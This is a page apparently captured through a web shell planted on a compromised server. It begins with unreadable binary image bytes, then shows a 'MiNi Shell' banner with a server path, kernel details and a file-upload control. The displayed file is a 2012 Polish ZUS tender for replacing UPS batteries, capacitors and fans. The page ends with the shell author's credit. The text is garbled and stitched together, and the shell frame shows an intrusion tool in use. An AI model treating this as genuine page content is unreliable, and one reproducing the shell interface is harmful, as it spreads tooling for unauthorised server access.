JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120917/349930-N-2012.html

<p class="kh_header"><b>Rzeszów: Wymiana zużytych elementów w zasilaczach UPS w Oddziałach ZUS w Rzeszowie, Jaśle i Nowym Sączu.</b><br>
<b>Numer ogłoszenia: 349930 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana zużytych elementów w zasilaczach UPS w Oddziałach ZUS w Rzeszowie, Jaśle i Nowym Sączu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia

1. Przedmiotem zamówienia (część I, II, III) jest jednokrotne wykonanie odpłatnej usługi pogwarancyjnej polegającej na dostawie i wymianie zużytych elementów (podzespołów) w zasilaczach bezprzerwowych UPS wymienionych niżej:


Część zamówienia	Nazwa TJO UPS Zużyte elementy podlegające wymianie

I ZUS Oddział w Rzeszowie, Inspektorat ZUS w Przeworsku, ul. Dworcowa 1	Aros Sentry HT80	Komplet kondensatorów AC i DC, komplet kondensatorów AC filtra harmonicznych wejścia
			
			
II ZUS Oddział w Jaśle, Inspektorat ZUS w Dębicy, ul. Piłsudskiego 15	PW 9355-20-N (20 kVA)	Komplet baterii  (7Ah/12V) 72 sztuki
	ZUS Oddział w Jaśle, Inspektorat ZUS w Krośnie, ul. Bieszczadzka5	PW 9305-40i-NX-O (30 kVA)	Komplet wentylatorów, komplet kondensatorów AC60uF i DC3300uF
			
			
III ZUS Oddział w Nowym Sączu, Inspektorat ZUS w Limanowej, ul. Józefa Marka 21	MGE Galaxy PW (30 kVA)	Komplet 34 sztuk baterii 40 Ah 
	ZUS Oddział w Nowym Sączu, Nowy Sącz, ul. Węgierska 11	MGE Galaxy 5000 (100 kVA)	Komplet kondensatorów DC 20 sztukx6000uF/500VDC oraz komplet wentylatorów (D150 - 8 sztuk; D120 - 5 sztuk).

2. Zakres zamówienia
2.1. W ramach niniejszego zamówienia Wykonawca wykona: 

1). Część I: dostawę i wymianę  kompletu kondensatorów AC i DC oraz  komplet kondensatorów AC filtra harmonicznych wejścia w zasilaczu Aros Sentry HT80 w  Oddziale ZUS w Rzeszowie, Inspektorat w Przeworsku, ul. Dworcowa 1,

2). Część II: dostawę i wymianę  kompletu baterii 7Ah/12V, 72 sztuki w zasilaczu PW 9355-20-N (20 kVA)  w Oddziale ZUS w Jaśle, Inspektorat w Dębicy ul. Piłsudskiego 15; 
oraz dostawę i wymianę  kompletu wentylatorów i kompletu  kondensatorów AC 60uF i DC 3300uF w zasilaczu PW 9305-40i-NX-O (30 kVA) w Oddziale ZUS w Jaśle, Inspektorat w Krośnie  ul. Bieszczadzka 5,

3). Część III: dostawę i wymianę  kompletu 34 sztuk baterii 40 Ah w zasilaczu MGE Galaxy PW (30 kVA) w Oddziale ZUS w Nowym Sączu, Inspektorat w Limanowej  ul. Józefa Marka 21; oraz dostawę i wymianę  kompletu kondensatorów DC (20 sztuk x 6000uF/500VDC) i kompletu wentylatorów (D150 - 8 sztuk; D120 - 5 sztuk) w zasilaczu MGE Galaxy 5000 (100 kVA) w Oddziale ZUS w Nowym Sączu, ul. Węgierska 11.

2.2. Po wykonaniu wymiany ww. zużytych elementów Wykonawca dodatkowo sprawdzi funkcjonowanie zasilaczy:
a)- przeprowadzi procedurę startu i zatrzymania UPS,
b)- dla zasilaczy objętych wymianą baterii wykona test baterii,
c)-  dla zasilaczy objętych wymianą baterii wykona ocenę stanu i pojemności baterii, a w szczególności wykona pomiar napięcia i rezystancji wewnętrznej dla każdego akumulatora; Wykonawca zmierzy aktualną pojemność baterii w odniesieniu do pojemności nominalnej (w %) i poda wyniki w protokole powykonawczym.
d)- sprawdzi poprawność sygnalizacji stanu UPS (działanie panelu monitorującego, panelu RSP).

2.3. Wszystkie wymieniane elementy (podzespoły) muszą być:
a) fabrycznie nowe (nie regenerowane w ogóle),
b) dopuszczone do stosowania w serwisie przez producentów UPS-ów (zgodne z zaleceniami producenta urządzenia).
Po zakończeniu prac parametry zasilacza muszą być zgodne z zaleceniami producenta zasilacza.

2.4 .Na wymienione w trakcie prac elementy (baterie, kondensatory, wentylatory) Wykonawca udziela Zamawiającemu 12 miesięcznej gwarancji licząc od dnia podpisania przez obie strony protokołów wymiany.

2.5.Na wykonane prace montażowe Wykonawca udziela Zamawiającemu 12 miesięcznej gwarancji licząc od dnia podpisania przez obie strony protokołów wymiany baterii i/lub wymiany kondensatorów. 

2.6.Wykonawca odbiera od Odbiorcy usługi zużyte baterie i zobowiązuje się do postępowania z tymi bateriami zgodnie z obowiązującymi w tym zakresie przepisami (np. utylizacja, zwrot do dystrybutora). Pozostałe zużyte elementy (kondensatory i wentylatory) pozostają własnością Odbiorcy.


3. Termin wykonania zamówienia
3.1. Wyżej wymienione prace zostaną wykonane w terminie do pięciu tygodni od daty zawarcia umowy.
3.2. Prace będą wykonywane w godzinach pracy Zamawiającego (7:30 - 15:30), a jeżeli zajdzie potrzeba również po godzinie 15:30 (15:30 - 22:00)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.53.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków określonych w pkt. 3.1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) .
Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów, po przeprowadzeniu analizy tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w pkt. 3.2. będzie spełniony, jeżeli Wykonawca wykonał co najmniej jedno zamówienie polegające na wymianie części w zasilaczach UPS w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie (załącznik nr 4 do SIWZ), o wartości jednej umowy co najmniej:
a) dla części I zamówienia - 10 tys. zł. (dotyczącej urządzeń UPS firmy AROS),
b) dla części II zamówienia - 6 tys. zł. (dotyczącej urządzeń UPS firmy Fiskars/Powerware),
c) dla części III zamówienia - 10 tys. zł. [dotyczącej urządzeń UPS firmy Merlin Gerin (MGE Galaxy, PW)].
Na potwierdzenie spełnienia warunku określonego w pkt. 4.1.b) Wykonawca złoży wykaz wykonanych usług wymiany części w zasilaczach UPS - w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
 Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów, po przeprowadzeniu analizy tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków określonych w pkt. 3.3. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) .
Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów, po przeprowadzeniu analizy tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków określonych w pkt. 3.4. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) .
Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów, po przeprowadzeniu analizy tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków określonych w pkt. 3.5. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) .
Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów, po przeprowadzeniu analizy tych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej  umowy w przypadku zmian funkcjonalno - organizacyjnych w ZUS.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w Rzeszowie przy Al. Piłsudskiego 12 pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 10:00, miejsce: W siedzibie Zamawiającego w Rzeszowie przy Al. Piłsudskiego 12 pok. 26 Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: dostawa i wymiana  kompletu kondensatorów AC i DC oraz  komplet kondensatorów AC filtra harmonicznych wejścia w zasilaczu Aros Sentry HT80 w  Oddziale ZUS w Rzeszowie, Inspektorat w Przeworsku, ul. Dworcowa 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I: dostawa i wymiana  kompletu kondensatorów AC i DC oraz  komplet kondensatorów AC filtra harmonicznych wejścia w zasilaczu Aros Sentry HT80 w  Oddziale ZUS w Rzeszowie, Inspektorat w Przeworsku, ul. Dworcowa 1,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: dostawa i wymiana  kompletu baterii 7Ah/12V, 72 sztuki w zasilaczu PW 9355-20-N (20 kVA)  w Oddziale ZUS w Jaśle, Inspektorat w Dębicy ul. Piłsudskiego 15; 
oraz dostawa i wymiana  kompletu wentylatorów i kompletu  kondensatorów AC 60uF i DC 3300uF w zasilaczu PW 9305-40i-NX-O (30 kVA) w Oddziale ZUS w Jaśle, Inspektorat w Krośnie  ul. Bieszczadzka 5,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: dostawa i wymiana  kompletu baterii 7Ah/12V, 72 sztuki w zasilaczu PW 9355-20-N (20 kVA)  w Oddziale ZUS w Jaśle, Inspektorat w Dębicy ul. Piłsudskiego 15; 
oraz dostawa i wymiana  kompletu wentylatorów i kompletu  kondensatorów AC 60uF i DC 3300uF w zasilaczu PW 9305-40i-NX-O (30 kVA) w Oddziale ZUS w Jaśle, Inspektorat w Krośnie  ul. Bieszczadzka 5,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III: dostawa i wymiana  kompletu 34 sztuk baterii 40 Ah w zasilaczu MGE Galaxy PW (30 kVA) w Oddziale ZUS w Nowym Sączu, Inspektorat w Limanowej  ul. Józefa Marka 21; oraz dostawę i wymianę  kompletu kondensatorów DC (20 sztuk x 6000uF/500VDC) i kompletu wentylatorów (D150 - 8 sztuk; D120 - 5 sztuk) w zasilaczu MGE Galaxy 5000 (100 kVA) w Oddziale ZUS w Nowym Sączu, ul. Węgierska 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III: dostawa i wymiana  kompletu 34 sztuk baterii 40 Ah w zasilaczu MGE Galaxy PW (30 kVA) w Oddziale ZUS w Nowym Sączu, Inspektorat w Limanowej  ul. Józefa Marka 21; oraz dostawę i wymianę  kompletu kondensatorów DC (20 sztuk x 6000uF/500VDC) i kompletu wentylatorów (D150 - 8 sztuk; D120 - 5 sztuk) w zasilaczu MGE Galaxy 5000 (100 kVA) w Oddziale ZUS w Nowym Sączu, ul. Węgierska 11..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com